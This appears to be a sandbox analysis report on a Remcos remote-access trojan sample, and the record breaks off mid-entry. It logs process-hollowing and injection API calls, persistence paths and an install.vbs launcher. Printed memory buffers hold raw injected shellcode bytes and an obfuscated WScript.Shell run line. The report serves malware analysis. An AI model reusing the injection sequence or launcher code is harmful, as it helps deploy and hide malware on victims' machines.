Process injection Process 1876 called NtSetContextThread to modify thread in remote process 2880
Process injection Process 4004 called NtSetContextThread to modify thread in remote process 2856
Process injection Process 2420 called NtSetContextThread to modify thread in remote process 2440
Process injection Process 4212 called NtSetContextThread to modify thread in remote process 5108
Process injection Process 4936 called NtSetContextThread to modify thread in remote process 4304
Process injection Process 5036 called NtSetContextThread to modify thread in remote process 4772
Process injection Process 4340 called NtSetContextThread to modify thread in remote process 4820
Process injection Process 2036 called NtSetContextThread to modify thread in remote process 620
Process injection Process 4148 called NtSetContextThread to modify thread in remote process 4836
Time & API Arguments Status Return Repeated
1619628933.635
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2528
success 0 0
1619628947.1665
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3400
success 0 0
1619628960.4325
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4068
success 0 0
1619628961.275625
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619628973.65075
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3284
success 0 0
1619628974.22925
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3472
success 0 0
1619628978.369875
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2812
success 0 0
1619628988.450249
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2880
success 0 0
1619628991.733436
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2856
success 0 0
1619628990.029501
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2440
success 0 0
1619629004.799534
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 5108
success 0 0
1619629013.674159
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4304
success 0 0
1619629016.362534
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4772
success 0 0
1619629026.940284
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4820
success 0 0
1619629035.111909
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 620
success 0 0
1619629037.456284
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4836
success 0 0
One or more non-safelisted processes were created (12 events)
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
Resumed a suspended thread in a remote process potentially indicative of process injection (32 events)
Process injection Process 2144 resumed a thread in remote process 2528
Process injection Process 3164 resumed a thread in remote process 3400
Process injection Process 3644 resumed a thread in remote process 4068
Process injection Process 3904 resumed a thread in remote process 3384
Process injection Process 3552 resumed a thread in remote process 3284
Process injection Process 3728 resumed a thread in remote process 3472
Process injection Process 3260 resumed a thread in remote process 2812
Process injection Process 1876 resumed a thread in remote process 2880
Process injection Process 4004 resumed a thread in remote process 2856
Process injection Process 2420 resumed a thread in remote process 2440
Process injection Process 4212 resumed a thread in remote process 5108
Process injection Process 4936 resumed a thread in remote process 4304
Process injection Process 5036 resumed a thread in remote process 4772
Process injection Process 4340 resumed a thread in remote process 4820
Process injection Process 2036 resumed a thread in remote process 620
Process injection Process 4148 resumed a thread in remote process 4836
Time & API Arguments Status Return Repeated
1619628933.65
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2528
success 0 0
1619628947.1825
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3400
success 0 0
1619628960.4635
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4068
success 0 0
1619628961.369625
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3384
success 0 0
1619628973.68275
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3284
success 0 0
1619628975.22925
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3472
success 0 0
1619628993.525875
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2812
success 0 0
1619628990.810249
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2880
success 0 0
1619628997.468436
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2856
success 0 0
1619628992.247501
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2440
success 0 0
1619629024.924534
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 5108
success 0 0
1619629014.628159
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4304
success 0 0
1619629021.003534
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4772
success 0 0
1619629027.596284
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4820
success 0 0
1619629041.330909
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 620
success 0 0
1619629047.159284
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4836
success 0 0
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)
dead_host 172.217.24.14:443
Executed a process and injected code into it, probably while unpacking (50 out of 187 events)
Time & API Arguments Status Return Repeated
1619610631.281
CreateProcessInternalW
thread_identifier: 1888
thread_handle: 0x00000108
process_identifier: 1752
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619610631.281
NtAllocateVirtualMemory
process_identifier: 1752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619610631.281
NtAllocateVirtualMemory
process_identifier: 1752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exe" ZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628921.416625
CreateProcessInternalW
thread_identifier: 2536
thread_handle: 0x000000d0
process_identifier: 2144
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619628933.635
CreateProcessInternalW
thread_identifier: 1816
thread_handle: 0x00000108
process_identifier: 2528
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628933.635
NtUnmapViewOfSection
process_identifier: 2528
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628933.635
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 2528
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628933.635
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628933.635
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2528
success 0 0
1619628933.65
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2528
success 0 0
1619628933.666
CreateProcessInternalW
thread_identifier: 2844
thread_handle: 0x0000010c
process_identifier: 1344
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 2528 16921921
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628934.963
CreateProcessInternalW
thread_identifier: 3168
thread_handle: 0x00000128
process_identifier: 3164
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000012c
inherit_handles: 0
success 1 0
1619628934.119125
NtResumeThread
thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 2528
success 0 0
1619628934.275125
CreateProcessInternalW
thread_identifier: 3080
thread_handle: 0x00000214
process_identifier: 3076
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\wscript.exe
track: 1
command_line: "C:\Windows\System32\WScript.exe" "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs"
filepath_r: C:\Windows\System32\WScript.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000174
inherit_handles: 0
success 1 0
1619628936.104375
CreateProcessInternalW
thread_identifier: 3252
thread_handle: 0x000002b0
process_identifier: 3248
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002f8
inherit_handles: 0
success 1 0
1619628947.1505
CreateProcessInternalW
thread_identifier: 3404
thread_handle: 0x00000108
process_identifier: 3400
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628947.1505
NtUnmapViewOfSection
process_identifier: 3400
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628947.1505
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 3400
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628947.1665
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628947.1665
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3400
success 0 0
1619628947.1825
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3400
success 0 0
1619628947.1975
CreateProcessInternalW
thread_identifier: 3464
thread_handle: 0x0000010c
process_identifier: 3460
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 3400 16935453
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628936.385375
CreateProcessInternalW
thread_identifier: 3336
thread_handle: 0x00000080
process_identifier: 3332
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
track: 1
command_line: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000084
inherit_handles: 1
success 1 0
1619628948.60475
CreateProcessInternalW
thread_identifier: 3720
thread_handle: 0x00000108
process_identifier: 3716
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628948.60475
NtAllocateVirtualMemory
process_identifier: 3716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619628948.60475
NtAllocateVirtualMemory
process_identifier: 3716
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÃ…Ét èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628947.416625
NtResumeThread
thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 3400
success 0 0
1619628947.447625
CreateProcessInternalW
thread_identifier: 3560
thread_handle: 0x00000214
process_identifier: 3556
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\wscript.exe
track: 1
command_line: "C:\Windows\System32\WScript.exe" "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs"
filepath_r: C:\Windows\System32\WScript.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x0000020c
inherit_handles: 0
success 1 0
1619628948.21325
CreateProcessInternalW
thread_identifier: 3648
thread_handle: 0x0000011c
process_identifier: 3644
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000120
inherit_handles: 0
success 1 0
1619628948.88525
CreateProcessInternalW
thread_identifier: 3796
thread_handle: 0x00000280
process_identifier: 3792
